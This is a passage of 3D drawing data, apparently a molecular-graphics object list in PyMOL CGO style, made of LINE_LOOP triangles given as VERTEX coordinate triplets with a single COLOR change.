VERTEX, 14.842, 37.676, 24.119,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.544, 37.679, 23.842,
VERTEX, 14.842, 37.676, 24.119,
VERTEX, 14.604, 37.463, 23.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.842, 37.676, 24.119,
VERTEX, 14.604, 37.463, 23.893,
VERTEX, 14.888, 37.451, 24.120,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.604, 37.463, 23.893,
VERTEX, 14.888, 37.451, 24.120,
VERTEX, 14.771, 37.320, 23.824,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.888, 37.451, 24.120,
VERTEX, 14.771, 37.320, 23.824,
VERTEX, 15.055, 37.319, 24.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.771, 37.320, 23.824,
VERTEX, 15.055, 37.319, 24.034,
VERTEX, 14.946, 37.334, 23.676,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.055, 37.319, 24.034,
VERTEX, 14.946, 37.334, 23.676,
VERTEX, 15.245, 37.358, 23.911,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.946, 37.334, 23.676,
VERTEX, 15.245, 37.358, 23.911,
VERTEX, 15.027, 37.497, 23.536,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.245, 37.358, 23.911,
VERTEX, 15.027, 37.497, 23.536,
VERTEX, 15.347, 37.544, 23.823,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.347, 37.544, 23.823,
VERTEX, 15.609, 37.507, 24.118,
VERTEX, 15.300, 37.769, 23.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.609, 37.507, 24.118,
VERTEX, 15.300, 37.769, 23.821,
VERTEX, 15.573, 37.730, 24.162,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.300, 37.769, 23.821,
VERTEX, 15.573, 37.730, 24.162,
VERTEX, 15.133, 37.901, 23.907,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.573, 37.730, 24.162,
VERTEX, 15.133, 37.901, 23.907,
VERTEX, 15.407, 37.850, 24.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.133, 37.901, 23.907,
VERTEX, 15.407, 37.850, 24.264,
VERTEX, 14.943, 37.862, 24.030,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.407, 37.850, 24.264,
VERTEX, 14.943, 37.862, 24.030,
VERTEX, 15.207, 37.799, 24.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.943, 37.862, 24.030,
VERTEX, 15.207, 37.799, 24.365,
VERTEX, 14.842, 37.676, 24.119,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.207, 37.799, 24.365,
VERTEX, 14.842, 37.676, 24.119,
VERTEX, 15.091, 37.605, 24.405,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.842, 37.676, 24.119,
VERTEX, 15.091, 37.605, 24.405,
VERTEX, 14.888, 37.451, 24.120,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.091, 37.605, 24.405,
VERTEX, 14.888, 37.451, 24.120,
VERTEX, 15.127, 37.382, 24.362,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.888, 37.451, 24.120,
VERTEX, 15.127, 37.382, 24.362,
VERTEX, 15.055, 37.319, 24.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.127, 37.382, 24.362,
VERTEX, 15.055, 37.319, 24.034,
VERTEX, 15.293, 37.261, 24.260,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.055, 37.319, 24.034,
VERTEX, 15.293, 37.261, 24.260,
VERTEX, 15.245, 37.358, 23.911,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.293, 37.261, 24.260,
VERTEX, 15.245, 37.358, 23.911,
VERTEX, 15.493, 37.313, 24.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.245, 37.358, 23.911,
VERTEX, 15.493, 37.313, 24.159,
VERTEX, 15.347, 37.544, 23.823,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.493, 37.313, 24.159,
VERTEX, 15.347, 37.544, 23.823,
VERTEX, 15.609, 37.507, 24.118,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.609, 37.507, 24.118,
VERTEX, 15.823, 37.418, 24.418,
VERTEX, 15.573, 37.730, 24.162,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.823, 37.418, 24.418,
VERTEX, 15.573, 37.730, 24.162,
VERTEX, 15.794, 37.633, 24.495,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.573, 37.730, 24.162,
VERTEX, 15.794, 37.633, 24.495,
VERTEX, 15.407, 37.850, 24.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.794, 37.633, 24.495,
VERTEX, 15.407, 37.850, 24.264,
VERTEX, 15.629, 37.742, 24.612,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.407, 37.850, 24.264,
VERTEX, 15.629, 37.742, 24.612,
VERTEX, 15.207, 37.799, 24.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.629, 37.742, 24.612,
VERTEX, 15.207, 37.799, 24.365,
VERTEX, 15.426, 37.683, 24.700,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.207, 37.799, 24.365,
VERTEX, 15.426, 37.683, 24.700,
VERTEX, 15.091, 37.605, 24.405,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.426, 37.683, 24.700,
VERTEX, 15.091, 37.605, 24.405,
VERTEX, 15.302, 37.489, 24.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.091, 37.605, 24.405,
VERTEX, 15.302, 37.489, 24.708,
VERTEX, 15.127, 37.382, 24.362,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.302, 37.489, 24.708,
VERTEX, 15.127, 37.382, 24.362,
VERTEX, 15.332, 37.275, 24.631,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.127, 37.382, 24.362,
VERTEX, 15.332, 37.275, 24.631,
VERTEX, 15.293, 37.261, 24.260,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.332, 37.275, 24.631,
VERTEX, 15.293, 37.261, 24.260,
VERTEX, 15.496, 37.165, 24.514,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.293, 37.261, 24.260,
VERTEX, 15.496, 37.165, 24.514,
VERTEX, 15.493, 37.313, 24.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.496, 37.165, 24.514,
VERTEX, 15.493, 37.313, 24.159,
VERTEX, 15.700, 37.225, 24.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.493, 37.313, 24.159,
VERTEX, 15.700, 37.225, 24.426,
VERTEX, 15.609, 37.507, 24.118,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.700, 37.225, 24.426,
VERTEX, 15.609, 37.507, 24.118,
VERTEX, 15.823, 37.418, 24.418,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.823, 37.418, 24.418,
VERTEX, 15.999, 37.311, 24.721,
VERTEX, 15.794, 37.633, 24.495,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.999, 37.311, 24.721,
VERTEX, 15.794, 37.633, 24.495,
VERTEX, 15.970, 37.517, 24.818,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.794, 37.633, 24.495,
VERTEX, 15.970, 37.517, 24.818,
VERTEX, 15.629, 37.742, 24.612,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.970, 37.517, 24.818,
VERTEX, 15.629, 37.742, 24.612,
VERTEX, 15.808, 37.615, 24.948,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.629, 37.742, 24.612,
VERTEX, 15.808, 37.615, 24.948,
VERTEX, 15.426, 37.683, 24.700,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.808, 37.615, 24.948,
VERTEX, 15.426, 37.683, 24.700,
VERTEX, 15.606, 37.547, 25.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.426, 37.683, 24.700,
VERTEX, 15.606, 37.547, 25.034,
VERTEX, 15.302, 37.489, 24.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.606, 37.547, 25.034,
VERTEX, 15.302, 37.489, 24.708,
VERTEX, 15.484, 37.353, 25.027,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.302, 37.489, 24.708,
VERTEX, 15.484, 37.353, 25.027,
VERTEX, 15.332, 37.275, 24.631,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.484, 37.353, 25.027,
VERTEX, 15.332, 37.275, 24.631,
VERTEX, 15.512, 37.147, 24.930,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.332, 37.275, 24.631,
VERTEX, 15.512, 37.147, 24.930,
VERTEX, 15.496, 37.165, 24.514,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.512, 37.147, 24.930,
VERTEX, 15.496, 37.165, 24.514,
VERTEX, 15.674, 37.049, 24.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.496, 37.165, 24.514,
VERTEX, 15.674, 37.049, 24.800,
VERTEX, 15.700, 37.225, 24.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.674, 37.049, 24.800,
VERTEX, 15.700, 37.225, 24.426,
VERTEX, 15.876, 37.117, 24.714,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.700, 37.225, 24.426,
VERTEX, 15.876, 37.117, 24.714,
VERTEX, 15.823, 37.418, 24.418,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.876, 37.117, 24.714,
VERTEX, 15.823, 37.418, 24.418,
VERTEX, 15.999, 37.311, 24.721,
END,
COLOR, 0.000, 0.898, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 15.999, 37.311, 24.721,
VERTEX, 16.144, 37.217, 25.029,
VERTEX, 15.970, 37.517, 24.818,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.144, 37.217, 25.029,
VERTEX, 15.970, 37.517, 24.818,
VERTEX, 16.110, 37.418, 25.134,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.970, 37.517, 24.818,
VERTEX, 16.110, 37.418, 25.134,
VERTEX, 15.808, 37.615, 24.948,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.110, 37.418, 25.134,
VERTEX, 15.808, 37.615, 24.948,
VERTEX, 15.950, 37.503, 25.275,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.808, 37.615, 24.948,
VERTEX, 15.950, 37.503, 25.275,
VERTEX, 15.606, 37.547, 25.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.950, 37.503, 25.275,
VERTEX, 15.606, 37.547, 25.034,
VERTEX, 15.758, 37.422, 25.370,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.606, 37.547, 25.034,
VERTEX, 15.758, 37.422, 25.370,
VERTEX, 15.484, 37.353, 25.027,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.758, 37.422, 25.370,
VERTEX, 15.484, 37.353, 25.027,
VERTEX, 15.645, 37.221, 25.362,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.484, 37.353, 25.027,
VERTEX, 15.645, 37.221, 25.362,
VERTEX, 15.512, 37.147, 24.930,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.645, 37.221, 25.362,
VERTEX, 15.512, 37.147, 24.930,
VERTEX, 15.679, 37.020, 25.257,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.512, 37.147, 24.930,
VERTEX, 15.679, 37.020, 25.257,
VERTEX, 15.674, 37.049, 24.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.679, 37.020, 25.257,
VERTEX, 15.674, 37.049, 24.800,
VERTEX, 15.839, 36.935, 25.116,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.674, 37.049, 24.800,
VERTEX, 15.839, 36.935, 25.116,
VERTEX, 15.876, 37.117, 24.714,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.839, 36.935, 25.116,
VERTEX, 15.876, 37.117, 24.714,
VERTEX, 16.032, 37.017, 25.022,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.876, 37.117, 24.714,
VERTEX, 16.032, 37.017, 25.022,
VERTEX, 15.999, 37.311, 24.721,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.032, 37.017, 25.022,
VERTEX, 15.999, 37.311, 24.721,
VERTEX, 16.144, 37.217, 25.029,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.144, 37.217, 25.029,
VERTEX, 16.266, 37.165, 25.342,
VERTEX, 16.110, 37.418, 25.134,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.266, 37.165, 25.342,
VERTEX, 16.110, 37.418, 25.134,
VERTEX, 16.216, 37.365, 25.443,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.110, 37.418, 25.134,
VERTEX, 16.216, 37.365, 25.443,
VERTEX, 15.950, 37.503, 25.275,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.216, 37.365, 25.443,
VERTEX, 15.950, 37.503, 25.275,
VERTEX, 16.058, 37.436, 25.594,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.950, 37.503, 25.275,
VERTEX, 16.058, 37.436, 25.594,
VERTEX, 15.758, 37.422, 25.370,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.058, 37.436, 25.594,
VERTEX, 15.758, 37.422, 25.370,
VERTEX, 15.885, 37.335, 25.707,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.758, 37.422, 25.370,
VERTEX, 15.885, 37.335, 25.707,
VERTEX, 15.645, 37.221, 25.362,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.885, 37.335, 25.707,
VERTEX, 15.645, 37.221, 25.362,
VERTEX, 15.798, 37.123, 25.715,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.645, 37.221, 25.362,
VERTEX, 15.798, 37.123, 25.715,
VERTEX, 15.679, 37.020, 25.257,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.798, 37.123, 25.715,
VERTEX, 15.679, 37.020, 25.257,
VERTEX, 15.848, 36.923, 25.614,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.679, 37.020, 25.257,
VERTEX, 15.848, 36.923, 25.614,
VERTEX, 15.839, 36.935, 25.116,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.848, 36.923, 25.614,
VERTEX, 15.839, 36.935, 25.116,
VERTEX, 16.006, 36.853, 25.463,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.839, 36.935, 25.116,
VERTEX, 16.006, 36.853, 25.463,
VERTEX, 16.032, 37.017, 25.022,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.006, 36.853, 25.463,
VERTEX, 16.032, 37.017, 25.022,
VERTEX, 16.179, 36.953, 25.350,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.032, 37.017, 25.022,
VERTEX, 16.179, 36.953, 25.350,
VERTEX, 16.144, 37.217, 25.029,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.179, 36.953, 25.350,
VERTEX, 16.144, 37.217, 25.029,
VERTEX, 16.266, 37.165, 25.342,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.266, 37.165, 25.342,
VERTEX, 16.369, 37.182, 25.660,
VERTEX, 16.216, 37.365, 25.443,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.369, 37.182, 25.660,
VERTEX, 16.216, 37.365, 25.443,
VERTEX, 16.285, 37.378, 25.746,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.216, 37.365, 25.443,
VERTEX, 16.285, 37.378, 25.746,
VERTEX, 16.058, 37.436, 25.594,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.285, 37.378, 25.746,
VERTEX, 16.058, 37.436, 25.594,
VERTEX, 16.130, 37.431, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.058, 37.436, 25.594,
VERTEX, 16.130, 37.431, 25.906,
VERTEX, 15.885, 37.335, 25.707,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.130, 37.431, 25.906,
VERTEX, 15.885, 37.335, 25.707,
VERTEX, 15.993, 37.311, 26.047,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.885, 37.335, 25.707,
VERTEX, 15.993, 37.311, 26.047,
VERTEX, 15.798, 37.123, 25.715,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.993, 37.311, 26.047,
VERTEX, 15.798, 37.123, 25.715,
VERTEX, 15.956, 37.088, 26.085,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.798, 37.123, 25.715,
VERTEX, 15.956, 37.088, 26.085,
VERTEX, 15.848, 36.923, 25.614,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.956, 37.088, 26.085,
VERTEX, 15.848, 36.923, 25.614,
VERTEX, 16.039, 36.892, 25.999,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.848, 36.923, 25.614,
VERTEX, 16.039, 36.892, 25.999,
VERTEX, 16.006, 36.853, 25.463,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.039, 36.892, 25.999,
VERTEX, 16.006, 36.853, 25.463,
VERTEX, 16.195, 36.839, 25.838,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.006, 36.853, 25.463,
VERTEX, 16.195, 36.839, 25.838,
VERTEX, 16.179, 36.953, 25.350,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.195, 36.839, 25.838,
VERTEX, 16.179, 36.953, 25.350,
VERTEX, 16.332, 36.959, 25.698,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.179, 36.953, 25.350,
VERTEX, 16.332, 36.959, 25.698,
VERTEX, 16.266, 37.165, 25.342,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.332, 36.959, 25.698,
VERTEX, 16.266, 37.165, 25.342,
VERTEX, 16.369, 37.182, 25.660,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.369, 37.182, 25.660,
VERTEX, 16.464, 37.289, 25.990,
VERTEX, 16.285, 37.378, 25.746,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.464, 37.289, 25.990,
VERTEX, 16.285, 37.378, 25.746,
VERTEX, 16.332, 37.464, 26.057,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.285, 37.378, 25.746,
VERTEX, 16.332, 37.464, 26.057,
VERTEX, 16.130, 37.431, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.332, 37.464, 26.057,
VERTEX, 16.130, 37.431, 25.906,
VERTEX, 16.179, 37.497, 26.224,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.130, 37.431, 25.906,
VERTEX, 16.179, 37.497, 26.224,
VERTEX, 15.993, 37.311, 26.047,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.179, 37.497, 26.224,
VERTEX, 15.993, 37.311, 26.047,
VERTEX, 16.093, 37.369, 26.394,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.993, 37.311, 26.047,
VERTEX, 16.093, 37.369, 26.394,
VERTEX, 15.956, 37.088, 26.085,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.093, 37.369, 26.394,
VERTEX, 15.956, 37.088, 26.085,
VERTEX, 16.126, 37.153, 26.467,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.956, 37.088, 26.085,
VERTEX, 16.126, 37.153, 26.467,
VERTEX, 16.039, 36.892, 25.999,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.126, 37.153, 26.467,
VERTEX, 16.039, 36.892, 25.999,
VERTEX, 16.258, 36.978, 26.400,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.039, 36.892, 25.999,
VERTEX, 16.258, 36.978, 26.400,
VERTEX, 16.195, 36.839, 25.838,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.258, 36.978, 26.400,
VERTEX, 16.195, 36.839, 25.838,
VERTEX, 16.411, 36.944, 26.232,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.195, 36.839, 25.838,
VERTEX, 16.411, 36.944, 26.232,
VERTEX, 16.332, 36.959, 25.698,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.411, 36.944, 26.232,
VERTEX, 16.332, 36.959, 25.698,
VERTEX, 16.497, 37.073, 26.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.332, 36.959, 25.698,
VERTEX, 16.497, 37.073, 26.062,
VERTEX, 16.369, 37.182, 25.660,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.497, 37.073, 26.062,
VERTEX, 16.369, 37.182, 25.660,
VERTEX, 16.464, 37.289, 25.990,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.464, 37.289, 25.990,
VERTEX, 16.570, 37.511, 26.338,
VERTEX, 16.332, 37.464, 26.057,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.570, 37.511, 26.338,
VERTEX, 16.332, 37.464, 26.057,
VERTEX, 16.391, 37.644, 26.391,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.332, 37.464, 26.057,
VERTEX, 16.391, 37.644, 26.391,
VERTEX, 16.179, 37.497, 26.224,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.391, 37.644, 26.391,
VERTEX, 16.179, 37.497, 26.224,
VERTEX, 16.240, 37.652, 26.564,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.179, 37.497, 26.224,
VERTEX, 16.240, 37.652, 26.564,
VERTEX, 16.093, 37.369, 26.394,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.240, 37.652, 26.564,
VERTEX, 16.093, 37.369, 26.394,
VERTEX, 16.206, 37.530, 26.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.093, 37.369, 26.394,
VERTEX, 16.206, 37.530, 26.756,
VERTEX, 16.126, 37.153, 26.467,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.206, 37.530, 26.756,
VERTEX, 16.126, 37.153, 26.467,
VERTEX, 16.308, 37.349, 26.854,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.126, 37.153, 26.467,
VERTEX, 16.308, 37.349, 26.854,
VERTEX, 16.258, 36.978, 26.400,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.308, 37.349, 26.854,
VERTEX, 16.258, 36.978, 26.400,
VERTEX, 16.487, 37.216, 26.801,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.258, 36.978, 26.400,
VERTEX, 16.487, 37.216, 26.801,
VERTEX, 16.411, 36.944, 26.232,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.487, 37.216, 26.801,
VERTEX, 16.411, 36.944, 26.232,
VERTEX, 16.638, 37.208, 26.628,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.411, 36.944, 26.232,
VERTEX, 16.638, 37.208, 26.628,
VERTEX, 16.497, 37.073, 26.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.638, 37.208, 26.628,
VERTEX, 16.497, 37.073, 26.062,
VERTEX, 16.672, 37.330, 26.436,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.497, 37.073, 26.062,
VERTEX, 16.672, 37.330, 26.436,
VERTEX, 16.464, 37.289, 25.990,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.672, 37.330, 26.436,
VERTEX, 16.464, 37.289, 25.990,
VERTEX, 16.570, 37.511, 26.338,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.570, 37.511, 26.338,
VERTEX, 16.636, 37.816, 26.649,
VERTEX, 16.391, 37.644, 26.391,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.636, 37.816, 26.649,
VERTEX, 16.391, 37.644, 26.391,
VERTEX, 16.422, 37.890, 26.690,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.391, 37.644, 26.391,
VERTEX, 16.422, 37.890, 26.690,
VERTEX, 16.240, 37.652, 26.564,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.422, 37.890, 26.690,
VERTEX, 16.240, 37.652, 26.564,
VERTEX, 16.275, 37.871, 26.865,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.240, 37.652, 26.564,
VERTEX, 16.275, 37.871, 26.865,
VERTEX, 16.206, 37.530, 26.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.275, 37.871, 26.865,
VERTEX, 16.206, 37.530, 26.756,
VERTEX, 16.280, 37.771, 27.071,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.206, 37.530, 26.756,
VERTEX, 16.280, 37.771, 27.071,
VERTEX, 16.308, 37.349, 26.854,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.280, 37.771, 27.071,
VERTEX, 16.308, 37.349, 26.854,
VERTEX, 16.435, 37.648, 27.188,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.308, 37.349, 26.854,
VERTEX, 16.435, 37.648, 27.188,
VERTEX, 16.487, 37.216, 26.801,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.435, 37.648, 27.188,
VERTEX, 16.487, 37.216, 26.801,
VERTEX, 16.649, 37.575, 27.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.487, 37.216, 26.801,
VERTEX, 16.649, 37.575, 27.147,
VERTEX, 16.638, 37.208, 26.628,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.649, 37.575, 27.147,
VERTEX, 16.638, 37.208, 26.628,
VERTEX, 16.796, 37.593, 26.972,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.638, 37.208, 26.628,
VERTEX, 16.796, 37.593, 26.972,
VERTEX, 16.672, 37.330, 26.436,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.796, 37.593, 26.972,
VERTEX, 16.672, 37.330, 26.436,
VERTEX, 16.791, 37.694, 26.766,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.672, 37.330, 26.436,
VERTEX, 16.791, 37.694, 26.766,
VERTEX, 16.570, 37.511, 26.338,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.791, 37.694, 26.766,
VERTEX, 16.570, 37.511, 26.338,
VERTEX, 16.636, 37.816, 26.649,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.636, 37.816, 26.649,
VERTEX, 16.621, 38.154, 26.874,
VERTEX, 16.422, 37.890, 26.690,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.621, 38.154, 26.874,
VERTEX, 16.422, 37.890, 26.690,
VERTEX, 16.394, 38.163, 26.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.422, 37.890, 26.690,
VERTEX, 16.394, 38.163, 26.904,
VERTEX, 16.275, 37.871, 26.865,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.394, 38.163, 26.904,
VERTEX, 16.275, 37.871, 26.865,
VERTEX, 16.251, 38.119, 27.078,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.275, 37.871, 26.865,
VERTEX, 16.251, 38.119, 27.078,
VERTEX, 16.280, 37.771, 27.071,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.251, 38.119, 27.078,
VERTEX, 16.280, 37.771, 27.071,
VERTEX, 16.276, 38.047, 27.295,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.280, 37.771, 27.071,
VERTEX, 16.276, 38.047, 27.295,
VERTEX, 16.435, 37.648, 27.188,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.276, 38.047, 27.295,
VERTEX, 16.435, 37.648, 27.188,
VERTEX, 16.454, 37.990, 27.427,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.435, 37.648, 27.188,
VERTEX, 16.454, 37.990, 27.427,
VERTEX, 16.649, 37.575, 27.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.454, 37.990, 27.427,
VERTEX, 16.649, 37.575, 27.147,
VERTEX, 16.682, 37.980, 27.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.649, 37.575, 27.147,
VERTEX, 16.682, 37.980, 27.397,
VERTEX, 16.796, 37.593, 26.972,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.682, 37.980, 27.397,
VERTEX, 16.796, 37.593, 26.972,
VERTEX, 16.825, 38.024, 27.223,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.796, 37.593, 26.972,
VERTEX, 16.825, 38.024, 27.223,
VERTEX, 16.791, 37.694, 26.766,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.825, 38.024, 27.223,
VERTEX, 16.791, 37.694, 26.766,
VERTEX, 16.800, 38.096, 27.007,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.791, 37.694, 26.766,
VERTEX, 16.800, 38.096, 27.007,
VERTEX, 16.636, 37.816, 26.649,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.800, 38.096, 27.007,
VERTEX, 16.636, 37.816, 26.649,
VERTEX, 16.621, 38.154, 26.874,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.621, 38.154, 26.874,
VERTEX, 16.550, 38.526, 27.036,
VERTEX, 16.394, 38.163, 26.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.550, 38.526, 27.036,
VERTEX, 16.394, 38.163, 26.904,
VERTEX, 16.324, 38.485, 27.055,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.394, 38.163, 26.904,
VERTEX, 16.324, 38.485, 27.055,
VERTEX, 16.251, 38.119, 27.078,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.324, 38.485, 27.055,
VERTEX, 16.251, 38.119, 27.078,
VERTEX, 16.186, 38.418, 27.225,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.251, 38.119, 27.078,
VERTEX, 16.186, 38.418, 27.225,
VERTEX, 16.276, 38.047, 27.295,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.186, 38.418, 27.225,
VERTEX, 16.276, 38.047, 27.295,
VERTEX, 16.214, 38.363, 27.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.276, 38.047, 27.295,
VERTEX, 16.214, 38.363, 27.446,
VERTEX, 16.454, 37.990, 27.427,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.214, 38.363, 27.446,
VERTEX, 16.454, 37.990, 27.427,
